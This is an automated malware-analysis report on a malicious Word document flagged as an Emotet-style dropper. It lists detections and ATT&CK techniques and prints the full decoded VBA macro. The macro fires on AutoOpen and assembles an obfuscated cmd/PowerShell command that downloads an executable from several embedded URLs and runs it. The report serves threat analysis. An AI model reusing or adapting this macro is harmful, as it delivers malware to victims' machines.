Verdict: MALICIOUS (Risk Score: 142)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is designed to execute obfuscated commands, including a call to 'Shell' which likely initiates the download and execution of a second-stage payload. The ClamAV detection name 'Doc.Dropper.Emooodldr-6691359-0' strongly suggests the Emooodldr family.
Heuristics (5)
- ClamAV: Doc.Dropper.Emooodldr-6691359-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Emooodldr-6691359-0
- VBA macros detected [medium] (OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4084 bytes |

SHA-256: c5058d784a0e96a584bb2c5d88ca0ec2f598944acd062d32d7036bfe07a4ba4d

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "hdsOBAp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Dim pdYMEp()
ReDim pdYMEp(4)
pdYMEp(0) = 7
pdYMEp(1) = 6
pdYMEp(2) = 9
pdYMEp(3) = 115
Dim dmuXuF()
ReDim dmuXuF(4)
dmuXuF(0) = 288606196
dmuXuF(1) = 1796
dmuXuF(2) = 9059
dmuXuF(3) = 462895274
Dim dYkGf()
ReDim dYkGf(2)
dYkGf(0) = 256451975
dYkGf(1) = 21
Dim ijdbI()
ReDim ijdbI(4)
ijdbI(0) = 82
ijdbI(1) = 1208
ijdbI(2) = 3463
ijdbI(3) = 362
Dim nQoazG()
ReDim nQoazG(4)
nQoazG(0) = 956
nQoazG(1) = 56
nQoazG(2) = 10
nQoazG(3) = 373
Dim buEVpY()
ReDim buEVpY(2)
buEVpY(0) = 3816
buEVpY(1) = 73
Shell@ GEuwUIqwP + UwJBScQFJCkdRn + jDiXMVzHbJLa, Format(0)
Dim CBQXSF()
ReDim CBQXSF(2)
CBQXSF(0) = 49
CBQXSF(1) = 13
Dim KHZnJ()
ReDim KHZnJ(3)
KHZnJ(0) = 6
KHZnJ(1) = 5
KHZnJ(2) = 565
Dim TXEtFw()
ReDim TXEtFw(2)
TXEtFw(0) = 188182558
TXEtFw(1) = 710
End Sub
Attribute VB_Name = "pizBCaJRqDVj"
Function GEuwUIqwP()
On _
Error _
Resume _
Next
Dim SIbYi()
ReDim SIbYi(3)
SIbYi(0) = 2
SIbYi(1) = 6764
SIbYi(2) = 57
Dim SzlWU()
ReDim SzlWU(3)
SzlWU(0) = 466425254
SzlWU(1) = 2641
SzlWU(2) = 15
jTXXwLiVd = Format(Chr(15 + 3 + 10 + 0 + 71)) + "md /V^:ON/" + Format(Chr(10 + 2 + 7 + 0 + 48)) + Format(Chr(4 + 1 + 3 + 0 + 26)) + "s^e^t Q^3^d^A=^ ^ " + " ^ ^ ^ }}^{h" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "^ta" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "^};^k" + "aer^b^;vA^K^$ me^" + "tI-ek^ovnI^;)" + "vA^K^$ ,zZL^$(e^l^iFda^" + "o^ln^w^o^D^.pl^" + "q^$^{^yrt^{)R" + "W^b^$^ " + "ni^ ^z^Z^L^$(h" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "aer^of;'^e^x^e." + "^'^+a^JN^$+^'\^'+" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "i^l" + "b^u^p:vne^$=v^" + "AK$^;^'0^"
Dim djvcF()
ReDim djvcF(2)
djvcF(0) = 94
djvcF(1) = 156569568
Dim NQwlRQ()
ReDim NQwlRQ(4)
NQwlRQ(0) = 15
NQwlRQ(1) = 63
NQwlRQ(2) = 9
NQwlRQ(3) = 79
Dim XulBV()
ReDim XulBV(5)
XulBV(0) = 5921
XulBV(1) = 7
XulBV(2) = 9
XulBV(3) = 201
XulBV(4) = 4204
wmQOEW = "7^1^' =^ aJN$;)" + "^'@^'(ti^l^pS^.^'X/^mo" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "." + "n^i^s^e^mh" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "e^tari^w//:^p^t^t" + "h@j/^t^en^" + ".^s^s^e" + "n^l^l^e^w^tr^a//^:p^t^th@" + Format(Chr(10 + 2 + 7 + 0 + 48)) + "ox" + "X^Yh/m^o" + Format(Chr(15 + 3 + 10 + 0 + 71)) + ".^dnr" + "-e" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "n^aill^a//^:^p^tt^"
Dim JzRulf()
ReDim JzRulf(2)
JzRulf(0) = 1095
JzRulf(1) = 9876
Dim bTtnQF()
ReDim bTtnQF(3)
bTtnQF(0) = 4235
bTtnQF(1) = 238160540
bTtnQF(2) = 6
oEIzz = "h@1^H/r^f.ved-^s^p^pa.ru" + "e^t" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "enno" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "//" + "^:pt^th@B^o^l^ai" + "R^l^k/m^" + "o" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "^.^s^uwag//^:" + "p^tt^h^'=RW^b^$^;tn"
Dim BDiwFw()
ReDim BDiwFw(5)
BDiwFw(0) = 8918
BDiwFw(1) = 336020556
BDiwFw(2) = 480
BDiwFw(3) = 7436
BDiwFw(4) = 61
Dim TkIqZm()
ReDim TkIqZm(5)
TkIqZm(0) = 813
TkIqZm(1) = 3
TkIqZm(2) = 95
TkIqZm(3) = 353511012
TkIqZm(4) = 908
Dim ztmdn()
ReDim ztmdn(3)
ztmdn(0) = 69
ztmdn(1) = 3213
ztmdn(2) = 3445
Dim XWRYc()
ReDim XWRYc(5)
XWRYc(0) = 6789
XWRYc(1) = 188766924
XWRYc(2) = 271
XWRYc(3) = 59
XWRYc(4) = 638
HnZCmwS = "^eil" + Format(Chr(10 + 2 + 7 + 0 + 48)) + "beW^.^t^eN" + " ^t" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "e^j^bo^-^w^en^=p" + "lq^$^ ^l^le^hsrew^op&&^f" + "^or /^L %^F ^in (^35^1;" + "^-1^;^0)^do ^set V" + "^P=!V^P!!Q^3^d^A:~%^F,1!&&i^" + "f %^F=^=^0 " + Format(Chr(15 + 3 + 10 + 0 + 71)) + "a^l^l %V^P:~^-3^5" + "^2%" + Format(Chr(4 + 1 + 3 + 0 + 26)) + ""
GEuwUIqwP = jTXXwLiVd + wmQOEW + oEIzz + HnZCmwS
Dim faEBXz()
ReDim faEBXz(4)
faEBXz(0) = 112
faEBXz(1) = 64533234
faEBXz(2) = 120
faEBXz(3) = 1970
End Function